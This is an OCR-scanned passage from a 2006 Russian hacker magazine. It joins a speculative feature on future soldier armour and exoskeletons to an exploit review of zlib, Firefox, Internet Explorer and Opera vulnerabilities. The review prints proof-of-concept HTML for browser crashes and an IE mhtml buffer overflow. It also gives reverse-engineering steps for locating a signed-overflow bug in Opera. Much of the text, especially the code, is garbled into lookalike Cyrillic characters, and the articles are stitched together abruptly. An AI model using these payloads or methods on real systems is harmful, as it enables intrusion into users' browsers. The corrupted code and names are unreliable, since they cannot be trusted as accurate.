над объемом жидкости позволит экономнее 
расходовать воду и предотвратить обезвожи- 
вание организма. Ряд полимерных актюато- 
ров, из которых будет состоять костюм, по 
сигналу от медицинского компьютера будут 
делать определенные участки жестче или 
мягче. Если, например, солдат сломает ногу, 
местный экзоскелет позволит захватить ее 
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в искусственные шины, сформированные 
тканью костюма. Ну а если солдат болен, то 
доктор, находящийся в тысячах километров 
от него, проанализировав состояние солдата, 
отдаст соответствующие команды медицин- 
скому компьютеру, который сделает необхо- 
димые инъекции и сконфигурирует экзоске- 
лет. МЭМС-акселерометры всегда скажут 
солдату, какого направления выстрелов стоит 
опасаться, то есть постоянно обновляющаяся 
вероятность пробивания бронежилета, в зави- 
симости от попадания в солдата, также будет 
одним из жизненно важных информативных 
показателей. 

Если же солдат не успеет сам вызвать медика, 
то это сделает его компьютер по данным дат- 
чиков, заблокировав солдата в экзоскелете и 
включив системы жизнеобеспечения. Таким 
образом, солдат будет «закован в латы» до 
прихода врача. 

Солдаты смогут обмениваться данными в ре- 
альном времени с транспортными средствами, 
вертолетами, танками, роботами поддержки 
и другой техникой, возможно также дистанци- 
онное управление техникой. Еще, по словам 
Де Г эя, вертолеты, летящие впереди отряда, 
будут передавать информацию о противнике 
пехоты. В новом костюме солдат сосредото- 
чится только на одном — на ведении боя. 
Можно смело сказать, что с таким снаряже- 
нием ведение войн будет напоминать сетевую 
баталию ВаШеІіеІб 2142. 

Однако тебе никто не сможет помешать поп- 
робовать перехватить контроль над «умным 
костюмом» на себя, и тогда огромная армия 
может за пару минут превратиться в беспо- 
мощные консервы, заблокированные своими 



Динамическая броня буде^амаутштизироватъі 
энергию боеприпаса 



же костюмами. Но сделать это, скорее всего, 
будет нелегко: все командные передачи в 
основном криптографируются, и не факт, что 
можно будет сломать этот код за время наступ- 
ления суперармии. 

Отсюда вывод: технически отсталые страны 
при возникновении военного конфликта в бу- 
дущем практически обречены на поражение. 
Даже партизанская война может не принести 
результатов при такой степени защиты и снаб- 
жении информацией одиночного солдата. 

Зачем тебе 2 скелета? 

Вряд ли солдат будущего будет носить на себе 
броню. Скорее всего, броня сама будет его 
носить. Одна из важнейших частей солдатс- 
кой брони будущего — экзоскелет, который 
не только позволит передвигаться быстрее и 
переносить тяжести (например, стационарные 
пулеметы и ракетные установки), но и позволит 
в моменты опасности полностью «закуклить» 
солдата в сверхтвердый кокон. 

Создание экзоскелета — это сверхзадача, 
ведь нужно создать аппарат, который бы 
помогал, когда требуется, и при этом не 
мешал. В идеале экзоскелет заменит человеку 
руки, ноги и возьмет на себя минимум 95% 
груза. Кроме того, «костюм» должен слиться 
с человеком, исполнять его желания, нередко 
предугадывая их. Американское оборонное 
агентство ОАРВА уже давно занимается 
превращением солдат в строггов, приделывая 
им различные пневматические конечности и 
делая из них «летунов». На сегодняшний день 
именно ОАРВА имеет наиболее солидный парк 
прототипов различных экзоскелетов. Но из-за 
громоздкости и неудобства управления они 
пока не достигли совершенства. 

Однако это не мешает даже этим несовер- 
шенным киберусилителям поражать вообра- 
жение. Например, австралийская арт-группа 
5ТЕІ_АВС еще в 1 998 году создала на основе 
сконструированных ею экзоскелетов-паков 
Ехозкеіеіопз красочное шоу. Шестиногая 
шагающая машина может двигаться во все 
четыре стороны, разворачиваться на месте и 
приседать на корточки. В центре шагающей 
машины находится вращающаяся платформа 
(место для человека), оборудованная меха- 
нической «левой рукой» с пневматическим 
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манипулятором. Зрелище, надо сказать, не для 
слабонервных. 

Другой пример — летающий экзоскелет с 
двумя турбовентиляторами ЗоІоТ гек ХРѴ, ко- 
торый должен летать. Но одной из главных его 
проблем является двигатель: он должен быть 
мощным, но не шумным. А отсюда вытекает 
еще одна проблема — источники питания и 
топливо. 

Не до конца все ясно и с рабочими «ногами». 
Судя по всему, от колес и гусениц решено 
отказаться, а среди предложений встречается 
и варианте пружинящими гидравлическими 
костылями (игрушка-тренажер подобного типа 
у нас продавалась под маркой «Кузнечик», а у 
них — Родотаііс), и «паучий» вариант — плат- 
форма с множеством ног, а также вариант, 
близкий к киношному Роѵѵегіоабег. 

Есть рабочие экзоскелеты даже на двигателе 
внутреннего сгорания! Например, фирма 
Засгоз из Солт-Лейк-Сити, штат Юта, создала 
конструктивно сложный экзоскелет с мно- 
жеством «суставов» и собственным бортовым 
компьютером, принимающим сигналы от 20 
датчиков. В движение элементы экзоскелета 
приводятся гидравлической системой, ра- 
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ботающей от ДВС, размещенного в специ- 
альном ранце. Все это позволяет владельцу 
скелета носить без каких-либо затруднений 
90-100 кг груза. В настоящее время разработ- 
чики экзоскелета пытаются создать более 
удобный привод для своего детища, так как 
таскать с собой двигатель с запасом топлива 
в боевых условиях не слишком безопасно :). 
Еще один путь — биомеханические протезы, 
которые будут управляться биотоками мышц 
солдата. Но и это не снимает проблему полу- 
чения энергии для него. 

Фантастический вариант предлагает для эк- 
зоскелетов уже известный нам друг Г ордона 
Фримена Эдвин Томас. Он предлагает сде- 
лать весь костюм экзоскелетом, состоящим 
из специально сконструированных нанома- 
шин-усилителей, которые смогут увеличить 
силу солдата на 300%. 

Томас заявляет, что ответная реакция костю- 
ма будет аналогична работе подушек безо- 
пасности в автомобилях. «Меньше секунды 
пройдет между детектированием удара или 
кровотечения и ответной реакцией костюма. 

И все это благодаря существующим МЭМС- 
акселерометрам», — говорит Томас. 
Естественно, через несколько лет речь 
уже будет идти о НЭМС-акселерометрах. И 
именно они наверняка будут использоваться 
в качестве детекторов ударов в солдатском 
костюме. Исследователи поясняют, как они 
будут работать над созданием экзоскелета. 
Для обеспечения нужного быстродействия 
актюаторы должны быстро принимать нужное 
положение в зависимости от поступившего 
сигнала. Для этого необходимо поработать с 
уже имеющимися полимерами, найти методы 
их «быстрой» самосборки в нужные структу- 
ры и сделать их электропроводными. Далее 
необходимо узнать, будут ли эти полимерные 
материалы совместимы с живой тканью при 
длительном контакте. И наконец, воспользо- 
вавшись математическим моделированием, 





Искусственная печень — почему бы и нет? 



вычислить наиболее оптимальные места для 
размещения датчиков, их количество и типы. 
Далее действуют программисты — они пишут 
программное обеспечение для медицинского 
компьютера. 

Для того чтобы сделать костюм толщиной в 
несколько миллиметров достаточно прочным 
(постоянное использование экзоскелета 
может вызвать большие энергетические 
затраты), исследователи хотят создать его на 
основе структуры паутины. Паутина прочна, 
водоустойчива, гибка и легка, поэтому есть 
все основания полагать, что ее модификации 
будут хорошей базой для обмундирования. 
Паола Хэммонд, руководитель команды по 
биологической и химической защите Инсти- 
тута солдатских нанотехнологий, говорит: 
«Изучив структуру паутины, мы создали 
нановолокна из полиуретана диаметром 
около 1 00 нм, которые структурно похожи 
на обычную паутину, только гибче, легче и 
жестче настоящей». 

Но и это еще не все. Томас надеется нано- 
машинами утилизировать кинетическую 
энергию пуль и осколков, чтобы использовать 
ее для питания тех же наноактюаторов-мото- 
ров! Такой костюм будет получать энергию 
от выстрелов и пуль и становиться «жестче» 
при каждом попадании! С таким раскладом 
уложить на обе лопатки солдата будет нелег- 
ко. Необходимо будет выстрелом преодолеть 
определенную границу «энергетического 
барьера», чтобы костюм не смог поглотить 
избыточную кинетическую энергию. Но этот 
барьер будет достаточно высоким, посколь- 
ку предел прочности бронежилета будет 
стремиться к модулю Юнга для алмазоидных 
материалов, ведь в идеале наномашины- 
актюаторы будут изготовлены именно из 
алмазоида. 

Куколка в коконе 

Одна из важнейших проблем в разработке 
костюма — создание эффективной гибри- 
дизации организма человека с механизмами 
костюма. Это нужно для успешного вытягива- 
ния из солдата информации о его здоровье и 
для срочного медикаментозного вмешатель- 
ства. Инженеры и биологи давно занимаются 
производством нанометровых трубок для 
того, чтобы создать работоспособные биоло- 
гические лаборатории-на-чипе, которые мож- 



но имплантировать в тело, соединив костюм и 
живые ткани. Опять попахивает строггами? Но 
вообще-то строггами быть отчасти выгодно 
— их можно в случае чего быстро «подла- 
тать», причем даже на поле боя! 

Чтобы эффективно распознать химическую 
или биологическую атаку, исследователи 
предложили использовать обычную чело- 
веческую печень. Как известно, этот орган 
очень чувствителен к различным вирусам 
и ядам. Исследователи изготовили чип, на 
котором содержится около 1 ,5 миллионов 
живых клеток печени для того, чтобы вовремя 
сообщить солдату об опасности. Под руко- 
водством Линды Г риффит отдел из Института 
солдатских нанотехнологий создал мобиль- 
ную и компактную версию печени. 

Чип представляет собой две ультратонкие 
пластины из кремния, разделенные рядом 
микроканалов. Далее на поверхность одной 
из пластин помещают живые клетки печени, 
которые располагаются в ячейках микронных 
размеров. Как только клетки «расположатся» 
внутри чипа, он будет похож на биореактор, 
способный производить специфические 
вещества при воздействии на него другими 
веществами и микроорганизмами. Через чип 
постоянно циркулирует вода, снабжая клетки 
питательными веществами. 

Через некоторое время клетки организуются 
в такие же структуры, как и в живой печени. 
Тогда чип начинает работать. Как только к 
клеткам поступят вещества, вредные для 
человека, они выработают определенный 
химический ответ, который будет интерпре- 
тирован медицинским компьютером, и солдат 
получит сообщение об опасности. Искусст- 
венная печень может обнаружить вредные 
вещества в очень малых концентрациях, что 
дает возможность солдату защититься от 
химической или биологической атаки раньше, 
чем она станет смертоносной. 
Интеллектуальные экспресс-анализаторы 
крови и различные датчики, размещенные в 
тканях тела, позволят упредить любое крити- 
ческое состояние солдата. Кроме стандарт- 
ной процедуры наложения локальной шины 
при переломе, системой костюма «датчи- 
ки-экзоскелет» предусматривается даже 
интернет-конференция с «телехирургами» и 
даже руководимое ими малое хирургическое 
вмешательство с помощью микроманипуля- 
торов-зондов. И представь себе — это все на 
поле боя! 
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Сенсоры обнаружили угрозу для жизни — от- 
равление. Сработал медицински^<омпышБр] 

и солдату впрыснут антидот. 



Как бы радужно тебе не представлялись 
перспективы персональной брони, с трудом 
верится в то, что кирзовые сапоги и плащ-па- 
латки исчезнут навсегда. Ведь для оконча- 
тельной разработки, массового выпуска и 
взятия на вооружение даже самого чудесного 
бронежилета нужно немало времени. Скорее 
всего, все вышеописанные чудеса массово 
будут распространены только к 2030 году. И 
это связано не с технической стороной дела, 
а скорее с экономической. Куда прикажешь 
деть практически все современное обмунди- 
рование? Войнам и локальным конфликтам 
нужно сперва «доесть» то, что на складах, а 




ктому времени, глядишь, появятся первые 
универсальные костюмы. 

Трудно пока представить, какими будут 
прототипы в 2030-2040 годах, но если не 
предвидится грандиозных открытий в физи- 
ке типа сингулярного оружия или силового 
поля, то вполне возможно, что обмундирова- 
ние опять сделает скачок в количественную 
сторону, а не в качественную. 

Может быть, добавятся технологии стелса 
или хамелеона, когда солдаты будут маски- 
роваться под камни, деревья и неприятель- 
ских солдат. Также первостепенным станет 
информационное противостояние и методы 
ведения хакерской войны, когда перехваты- 
вается управление над армиями, штабами 
и заводами. На этом фоне пословица «один 
в поле не воин» кажется актуальной как 
никогда. 

Именно с железных панцирей началась 
эволюция обмундирования. Первый прямой 
прародитель современных бронежилетов 
был сделан и запатентован в 1905-1907 
годах нашим соотечественником! При 
этом большинство их было принято на 
вооружение в тогдашней царской армии. 

Как сообщается в его брошюре, «Каталог 
панцирей, изобретенных подполковником А. 
А. Чемерзиным». 

Непробиваемость каждого панциря прове- 
ряется стрельбой в присутствии покупателя 
и на самом покупателе! Представь себе, 
были такие люди, которые не боялись надеть 
очередное изобретательское чудо и стать 
под дуло пистолета. 

Так, репортер газеты «Русь» (выпуск N69, 
1907г.) в корреспонденции, озаглавленной 
«Философ», писал: «Вчера я видел чудо. 
Молодой человек лет тридцати, в военной 
форме, стоял неподвижно в комнате. В 
полушаге расстояния на него был наведен 
браунинг — страшный браунинг. Целили 
прямо в грудь против сердца. Молодой чело- 
век ждал, улыбаясь. Раздался выстрел. Пуля 
отскочила... 



— Ну вот, видите, — сказал военный. — Поч- 
ти ничего и не почувствовал». 

Почти ничего не чувствовали под пулями фа- 
шистов и наши бравые солдаты, у которых 
был измененный вариант панциря Чемерзи- 
на — советский «панцирь». Солдаты обычно 
надевали его на ватник с оторванными 
рукавами, который служил дополнитель- 
ным амортизатором, несмотря на то, что у 
нагрудника с внутренней стороны имелась 
специальная подкладка. Но бывали случаи, 
когда «панцирь» надевали сверху маскхала- 
та, а также и сверху шинели. 

По отзывам фронтовиков, оценка подобного 
нагрудника была самая противоречивая: 
от лестных отзывов до полного неприятия. 
Но, проанализировав боевой путь «экспер- 
тов», приходишь к следующему парадоксу: 
нагрудник был ценен в штурмовых частях, 
которые брали крупные города, а отрица- 
тельные отзывы шли в основном из частей, 
которые захватывали полевые укрепления. 
«Панцирь» предохранял грудь от пуль и 
осколков, пока солдат шел или бежал, а 
также в рукопашной схватке, поэтому он был 
больше необходим в уличных боях. Однако в 
полевых условиях саперы-штурмовики боль- 
ше передвигались по-пластунски, и тогда 
стальной нагрудник становился абсолютно 
ненужной обузой, з = 



ІНаши советские панцириі 
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КРИС КАСПЕР 



ЕХРЮІТ5 



РЕѴІЕѴѴ 



Исследование и взлом закодированных скриптов 



01 



г даленное переполнение буфера 



6 июня Таѵіз Огтапсіу обнаружил уязви- 
мость библиотеки 21_ІВ версии 1 .2.2 (и более 
ранних), приводящую к переполнению буфера 
с возможностью выполнения произвольного 
кода на пораженной машине. Ошибка контроля 
допущена в функции іпіІаіе_іаЫе(), располо- 
женной в файле іпіігеез.с, ключевой фрагмент 
которой идет ниже: 

// сГюск іо г ап оѵег-зиЬзсгіЬесІ ог іпсотріеіе зеі оі ІепдіГіз 
Іеіі = 1 ; 

іог (Іеп = 1 ; Іеп <= МАХВІТЗ; Іеп++) 

{ 

Іеіі«= 1;Іеіі-= соипі[Іеп]; 
іі(1еіі<0) 

геіигп-1; //оѵег-зиЬзсгіЬесІ 

} 

іі (ІеТі > 0 && (іуре == ССЮЕЗ II (сосіез - соипі[0] 1=1))) 
геіигп -1 ; 

//іпсотріеіе зеі 

Исправленный вариант выглядит так: 

// сГіеск іог ап оѵег-зиЬзсгіЬесІ ог іпсотріеіе зеі оі ІепдіГіз 
Іеіі = 1 ; 



іог (Іеп = 1 ; Іеп <= МАХВІТЗ; Іеп++) 

{ 

Іеіі«= 1; Іеіі-=соипі[Іеп]; 
іі(1еіі<0) 

геіигп -1 ; // оѵег-зиЬзсгіЬесІ 

} 

іі (Іеіі > 0 && (іуре == ССЮЕЗ II тах 1=1)) 
геіигп -1 ; 

//іпсотріеіе зеі 

И хотя рабочего ехріоіі'а в сети обнаружить 
не удалось, приведенной выше информации 
вполне достаточно, чтобы его написал любой 
грамотный хакер. 

Это настоящая катастрофа! Библиотека 
2І_ІЕ> используется огромным количеством 
программ как с динамической, так и со ста- 
тической компоновкой. А это значит, что для 
устранения уязвимости обновить файл 2 ІІЫ . 
сІІІ/ІіЬг.зо будет явно недостаточно и потре- 
буется перекомпилировать все програм- 
мное обеспечение, слинкованное с 2І_ІЕ> 
статическим способом. А если программа 
включает в себя фрагменты исходных текс- 
тов компрессора, «вживляя» их в свое тело, 
то починить ее сможет только разработчик. 
Полный списокуязвимых систем можно най- 
ти на ѵѵѵѵѵѵ.зесипіѵіосиз.сот/ЬісІ/І 41 62/іпіо . 
а заплатки к ним — на ѵѵѵѵѵѵ.зесипМосиз. 
сот/Ыб/14162/зоІиііоп . Как и следовало 
ожидать, под угрозой оказались практи- 



чески все платформы: Арріе Мае 03 X, 
Сопесііѵа І_іпих, ЭеЬіап І_іпих, РгееВЗО и т.д. 

02 



МогіІІа іігеіох, зеатопкёуГ^^^И 
ІНипсІегЫгсІ: множественные уда 
ленные уязви 



До сих пор главным мотивом использования 
горящего лиса (и его производных) была 
уверенность в его безопасности. Чем боль- 
ше дыр обнаруживалось в ІЕ, тем охотнее 
пользователи переходили к аутсайдеру. 
Когда популярность лиса достигла некото- 
рой критической отметки, хакеры взялись 
за него всерьез, и дыры полились полновод- 
ной рекой, подмочив лису его огненно-рыжий 
хвост. Если так будет продолжаться и дальше, 
то движок МогіІІа (кстати говоря, расшиф- 
ровываемый как Мозаіс КіІІег — движок, на 
котором основан ІЕ), не только догонит, но и 
перегонит ІЕ! 

За последнее время было обнаружено огром- 
ное количество дыр в МогіІГе, позволяющих 
выполнять произвольный код на атакуемой 
машине, повышать уровень привилегий 
4аѵаЗсгірі вплоть до исполнения машинного 



060 



ХАКЕР 07 /91/ 06 







02 



РігеРох исполнят ^ѵаЗсгірі в пла- 
вающих фреймах, даже если они 
запрещены 



ІЕ не выдержал атаки и весь раскро- 
шился 



кода, запускать ^ѵаЗсгірІ, даже когда он от- 
ключен, обрушивать браузер, предоставлять 
доступ к личным данным пользователя и т. д. 
Все ошибки перечислять было бы слишком 
утомительно, вот только некоторые из них. 
Хакер по кличке тог_Ьид_г_а4 обнаружил, 
что иаѵаЗсгірІ, запущенный через компо- 
нент ЕѵаІІпЗапбЬох (используемый главным 
образом для автоматической настройки ргоху), 
может вырваться за пределы «песочницы» и 
повысить свои привилегии простым вызовом 
ѵаІиеОІ(). Это делается через обращение к 
объекту, созданному вне «песочницы», и «за- 
тягивания» его внутрь. Другой исследователь 
— Мікоіаі Э. НаЬгуп — обнаружил переполне- 
ние буфера в функции сгурІо.зідпТехІ() из-за 
неправильной обработки индексов в массивах. 
Также команда разработчиков столкнулась с 
трудновоспроизводимыми разрушениями па- 
мяти, создающими угрозу засылки зЬеІІ-кода со 
всеми вытекающими отсюда последствиями. 
Уязвимости подвержены следующие про- 
дукты: МогіІІаТЬипсІегЫгсІ 1 .5.2, МогіІІа РігеТох 
1 .5.3, ІМеІзсаре Вгоѵѵзег 8.0.4 (кстати говоря, 
более ранние версии неуязвимы). РгооІ-оІ- 
сопсері ехріоіі'ы можно найти в базе данных 
МогіІІа ВидгіІІа, доступной только разработ- 
чикам и закрытой для публичного доступа (к 
счастью, присоединиться к команде может 
практически любой желающий). 

иаѵа$сгір! работает, даже если он отключен 

<РіІтІ> 

<ЬосІу> 

сіігате 5гс="іаѵазсгірІ:аІегІ('РоипсІ Ьу ѵѵѵѵѵѵ.зузсігеат. 
сот !')"></ікате> 

</ЬосІу> 

</ЬітІ> 

НТМІ_код, вызывающий крах приложения 

<ЫтІ> 

<ЬосІу> 

<і!гате згс='1аѵазсгірІ:рагепІ.ЬоситепІѵѵгіІе(ТоипсІ Ьу 



ѵѵѵѵѵѵ.зузЬгеат.сот!')"></іР'ате> 

</ЬосІу> 

</ЫтІ> 

За более подробной информацией обращай- 
тесь по ссылкам: з есигіЫосиз.сот/Ыб/1 8228. 
ѵѵѵѵѵѵ.зесипМосиз.сот/Ьіб/І 6770/ и ѵѵѵѵѵѵ. 
зесигіЫосиз.сот/Ыб/1 7516 . 
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|Переполнение буфера в ІЕ МНТМЬ 



гптп 

МісгозоЙ прилагает большие усилия по защите 
и вылизыванию кода ІЕ, однако поток дыр не 
прекращается, и вот, 31 мая 2006 года, два 
хакера Мг Ыіеда и НагіЬагап обнаружили пере- 
полнение локального стекового буфера в фун- 
кции іпеІсоттІСАсІіѵеІІгІРіедиезЬРагзеІІгІ, 
принадлежащей библиотеке ІІ\ІЕТСОМІѴШи_. 
Исходный код последних версий ІЕ трансли- 
ровался компилятором МісгозоЙ ѴізиаІ Зіисііо 
,І\ІЕТ с ключом /05, активирующим примитив- 
ную защиту стека от переполнения, представ- 
ляющую собой некоторую разновидность 
Зіаск-ОиагсГа причем в его далеко не лучшей 
«инаугурации». Никогда не разрабатывающая 
собственных продуктов, а только «ворующая» 
уже готовые (авторитетный товарищ Берзуков 
в своей софт-панораме об этом только и гово- 
рит, сходите на ѵѵѵѵѵѵ.зоіІрапогата.ога/ВиІІеІіп/ 
Меѵѵз/АгсЫѵе/пеѵѵз078.1х1 . почитайте — там 
много интересного), Місгозой, как это часто и 
бывает, сама не поняла, что и у кого стащила. 

В практическом плане это значит, что при 
затирании секретного соокіе, расположенного 
перед адресом возврата, управление получает 
недокументированная функция іпеІсотт!_ 
герог!_дзІаіІиге, завершающая приложение 
в аварийном режиме. Короче, грохает ІЕ. 
Однако передать управление на зЬеІІ-код 



все-таки возможно, и в статье «Переполняю- 
щиеся буферы — активные средства защиты» 
показано, как это сделать (электронная копия 
лежит на моем сервере: І1р://пе7иті.ога.ги/риЬ/ 
зіаск-аиагсіз.гір ). 

Сами же ехріоіі'ы выглядят довольно триви- 
ально: 

<ЫтІ> 

<аЬгеІ ; ="тГі1:тІ://тісІ:ААА...АААА">ехатрІе</а> 

</ЫтІ> 

[БЕРАЮ] 

ВАЗЕ11Н1_= 

[ІпіетеіЗЬоЛсиі] 

1)НЦ=тЫтІ://тісІ:ААА...ААА 

А это фрагмент ехріоіі'а, поражающе- 
го ІЕ (полный текст находится на ѵѵѵѵѵѵ. 
зесигіМосиз.сот/баІа/ѵиІпегаЬіІШез/ 
ехріокз/і 81 98.игІ 1. 

Уязвимости подвержены следующие версии 
ІЕ: 6.0, 6.0 5Р1 , 6.0 5Р2, 7.0 Ьеіаі , 7.0 Ье1а2, а 
также, возможно, и более младшие версии 
(версия 6.0.2800.1 106, установленная у меня, 
неуязвима — сам проверял). 

За дополнительной информацией обращай- 
тесь на: ѵѵѵѵѵѵ.зесипМосиз.сот/Ыб/1 81 98/ . 
Опера — это быстрый, надежный, относительно 
безопасный и во многом культовый бразузер (не 
такой, конечно, культовый, как Рысь, но все-таки, 
сформировавший свое, особое сообщество). Я, 
например, люблю Оперу за развитый клавиатур- 
ный ввод, позволяющий вообще отказаться от 
мыши, что значительно ускоряет серфинг. Самое 
главное то, что Опера — это единственный неза- 
висимый браузер, созданный с нуля и лишенный 
тяжелого наследия прошлого. РігеРох, основан- 
ный надвижке МогіІІа, и ІЕ, все еще содержащий 
фрагменты кода древнего Мозаіс, представляют 
собой настоящее «кладбище» программистских 
технологий всех времен и народов. «Осадочные» 
слои кода взаимодействуют друг с другом очень 
сложным образом, и потому ошибки вылезают 
то тут, то там. Добавление новых свойств требует 
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глобального пересмотра всего кода, поскольку 
он уже давно превратился в сплошной клубок. . . 
Опера сначала проектировалась (с учетом всех 
требований современности), а потом кодиро- 
валась с четким разделением функций каждого 
модуля. Такой подход упрощает отладку продукта 
и ликвидирует целый пласт ошибок, но не стра- 
хует от них полностью. Программ без ошибок, 
увы, не бывает. В Опере они тоже встречаются. 
Последняя была обнаружена 1 3 апреля 2006 
года, исправлена и заново «переоткрыта» 7 июня, 
поскольку проблема оказалась намного серьез- 
ней, чем ожидалось. 

Речь идет о классическом знаковом переполне- 
нии, в последнее время находящимся под прице- 
лом хакеров всего мира. Рассмотрим следующий 
код и попробуем найти в нем ошибку: 

Пример, демонстрирующий простейший слу- 
чай знакового переполнения 

Цето_зіпдеЦ_оѵегІІо\л/(сГіаг *з) 

{ 

//объявление переменных 
N Іеп; сбаг Ьи^МАХЩЕЫ]; 

//определение длины строки 
Іеп = зігіеп(з); 

//если строка влезает в буфер, то копируем ее, 

//в противном случае возвращаем ошибку 
іі (Іеп < МАХ_1_ЕЫ) зІгпсруфіД з, Іеп); еізе геіигп 0; 

//тем или иным образом обрабатывает строку 
ргіпЩ"%з\п",ЬіЛ); 

} 

На первый взгляд все написано правильно 
— мы тщательно проверяем длину строки перед 
копированием в буфер. Тут идет речь о знаковом 
переполнении. Переменная Іеп имееттип зідпеб 
іпі (в большинстве компиляторов іпі имеет знако- 
вый тип по умолчанию), в то время как прототип 
функции зігпсру выглядит так: зИпсру(сИаг*сІзІ, 
сИаг*зоигсе, ипзідпеб іпісоипі). 

Предположим, что длина строки з превышает 
2 Гб, тогда как знаковый бит переменной Іеп 
будет установлен в единицу, и выражение (Іеп 
< МАХ_І_ЕІ\І) окажется истинным, поскольку Іеп 



-отрицательный, а всякое отрицательное число, 
как известно, меньше любого положительного. 

В тоже время функция зігпсру трактует Іеп как 
беззнаковый аргумент и копирует в буфер ЬиТ 
очень много байт. 

Чтобы избежать переполнения, необходимо явно 
объявить переменную Іеп как ипзідпеб іпі, но раз- 
работчики всегда об этом забывают. В том числе и 
разработчики Оперы. 

Итак, значит, Опера. Возьмем английскую версию 
8.52 и будем ее пытать ( ѵѵѵѵѵѵ.орега.сот/боѵѵпіоаб/ 
іпбех.бтІ?орзѵз=ѴѴіпбоѵѵ5&Іпа=еп&ѵег=8.52&рІа1 
іогт=ѴѴіпсІоѵѵ5&ІосаІ=ѵ У Это последняя уязвимая 
версия, и Орега8.54уже исправлена. Точнее, как 
бы исправлена. Беглый просмотр под дизассем- 
блером показывает, что знаковое сравнение там 
по-прежнему встречается, и всего лишь остается 
разобраться, какие именно входные параметры 
подвержены переполнению. Короче, надо копать 
от забора до обеда. 

Начнем с того, что файл орега.ехе упакован 
АЗРаск'ом — в Иех-редакторе хорошо видны 
секции .азраск, .асіаіа, а РЕЮЕ даже определяет 
версию упаковщика 2. 1 2. Однако при своем раз- 
мере в 78 Кб ничего интересного он содержать не 
может, и весь функционал сосредоточен в орега. 
сІІІ с размером 2,3 Мб, который также упакован 
АЗРаск'ом. 

Чтобы не искать готовый распаковщик (не все 
распаковщики умеют распаковывать динами- 
ческие библиотеки), воспользуемся утилитой 
РЕ-ТООБЗ и снимем дамп с орега.бІІ. Таблица 
импорта останется искаженной, но зачем она 
нам?! Мы же ведь не сгаск собрались писать, а 
проводить исследование на предмет безопаснос- 
ти. Главное, чтобы полученный дамп можно было 
загрузить в ЮА Рго или Гііеѵѵ, а все остальное 
— уже дело техники ! 

Поскольку стартовый код точки входа в сІІІ 
(бііепігу) искажен, ЮА Рго не может опознать 
компилятор и загрузить сигнатуры, оставляя 
нас без библиотечных имен, что значительно 
усложняет анализ. Впрочем, отождествить 
компилятор можно и вручную по текстовым 
строкам, оставленным из патриотических 
соображений поборниками авторских прав. 




Утилита РЕЮ определила, что орега.ехе 
упакована АЗРаск'ом 

Просмотр дампа в Иіеѵѵ'е убеждает нас в том, 
что Опера была скомпилирована ничем иным, 
как МісгозоЙ ѴізиаІ С++. 

Здесь ведется поиск текстовых строк в 
орега. сІІІ, что позволяет легко и быстро отож- 
дествить компилятор. 

Остается только загрузить соответствую- 
щие сигнатуры. Это делается так: в меню 
Рііе ЮА Рго выбираем пункт І_оасІ Не — РІ_ІВТ 
зідпаіиге Не, в появившемся списке име- 




Снятие полного дампа памяти с орега. сІІІ 
утилитой РЕТооІз 

ющихся сигнатур находим строку «ѵс32Ш 
МісгозоН ѴізиаІС 2-7/пеІ гипііте» и жмем 
<ЕІ\ІТЕВ>. Воттеперь с файлом можно по- 
настоящему работать! 

Как найти места потенциального знакового 
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переполнения? Существует множество 
путей. Например, можно искать все команды 
Л_, Л_Е или (если этих команд окажется 
слишком много) перебирать все вызовы 
строковых функций типа зігіеп, зігсру, 
ѵѵсзпсру, обращая внимание нате из них, 
что соседствуют со знаковым сравнением 
длины копируемой строки. Это уже почти 
переполнение! «Почти», потому что для 
совершения атаки необходимо, чтобы 
копируемые данные были как-то связаны с 
пользовательским вводом, и нигде по пути 
не «усекались». В принципе, задачу можно 
автоматизировать, написав специальный 
скрипт, но его разработка займет довольно 
продолжительное время, поскольку при- 
дется учитывать слишком много ситуаций. 
Так что «ручная» работа все же окажется 
эффективнее. 

ВегпИагсІ МиеІІег, работающий в австрийской 
компании 8ЕС СопзиІІ ІІпІегпеИтепзЬегаІипд 
ОтЫН, нашел одно из таких мест (о чем и 
рапортовал разработчикам Оперы, немед- 
ленно исправившим версию 8.54 и текущую 
— 9.0). Однако в программе по-прежнему 
присутствует большое количество ошибок 
подобного типа, которые ждут своего хаке- 
ра, поэтому нелишне присмотреться к уже 
заткнутой дырке получше. 

Дизассемблерный листинг уязвимой функции 
п2к_ѵиІпегаЫу со знакомым переполнением 

п2к_ѵи!пегаЫургос пеаг 



агд_згс = сіѵѵогсі ріг4 

агд_Іеп = сіѵѵогсі ріг 8 

тоѵеах, сіѵѵогсі_67Р9ЕР60; рОЬі 

ризГі еЬх ; сохраняем еЬх 

ризГі езі ; сохраняем езі 

ризГі есіі ; сохраняем есіі 

тоѵ есіі, [езр+0СГі+агд_Іеп] ; есіі := агд_1еп 

тоѵ езі, [еах+40И] ; рОезііпаііоп 

стр есіі, 1 0ООТі ; проверка длины агд_1еп 

тоѵ еЬх, есх ЦГіізсаІІ 

ІІ зЬогііос_67В8СР1С ; зее! оѵегГюге! 

тоѵ есіі, ОРРРИ ; «усечение» агд_1еп 

1ос_67В8СР1С: 

ризРі есіі ; зІ 2 :е_і 

ризГі [езр+ 1 0Гн-агд_згс] ; ѵѵсГіаМ: * 

ризГі езі ; \л/с1паг_Г 

саІІ _ѵѵсзпсру; копируем имя шрифта 

апсі ѵѵогсі ріг [езі+есІІ*2],0 ; ставим завершающий 0 

асісі езр, ОСИ ; выталкиваем аргументы 

тоѵ есх, еЬхЦГіізсаІІ 

ризИ езі ; скопированный агд_1еп 

саІІ зиЬ_67В8С01 0 ; обрабатываем имя шрифта 

Іезі ах, ах ; все ок? 

Іде зГіогі Іос_67В8СР48 ; имеем хэндл 

тоѵ есх, [еЬх+500Гі] ; обработчикошибки 

саІІ зиЬ_67В8С7ВС ; еах : = [есх] 

іпс еах ; еах++ 

Іос_67В8СР48: 

рор есіі ; восстанавливаем есіі 

рор езі ; восстанавливаем есіі 

рор еЬх ; восстанавливаем еЬх 

геіп 8 ; выталкиваем аргументы 



Как мы видим, эта процедура (назовем ее 
п2к_ѵиІпегаЫу) принимает два аргумента: 
указатель на строку и длину этой строки, 
которая затем сравнивается со знаковой 
операцией и константой 1000Н, в результате 
чего допустимые диапазоны длин строки 
оказываются равны [0, 1000И) и (7РРРРРРРИ, 
РРРРРРРРЬ]. Затем эта строка копируется 
внутрь какой-то структуры (по всей видимос- 
ти, объекта, поскольку присутствуют вызовы 
типаіИіз саІІ), которая передается функции 
зиЬ_67В8СЭ10 для обработки. 

Очевидно, что, передав строку размером 2 
Гб или выше, мы затрем добрую половину 
адресного пространства приложения, отчего 
ему станет очень нехорошо. В лучшем случае 
дело кончится крэшем, в худшем — пере- 
дачей збеІІ-кода и захватом управления. 

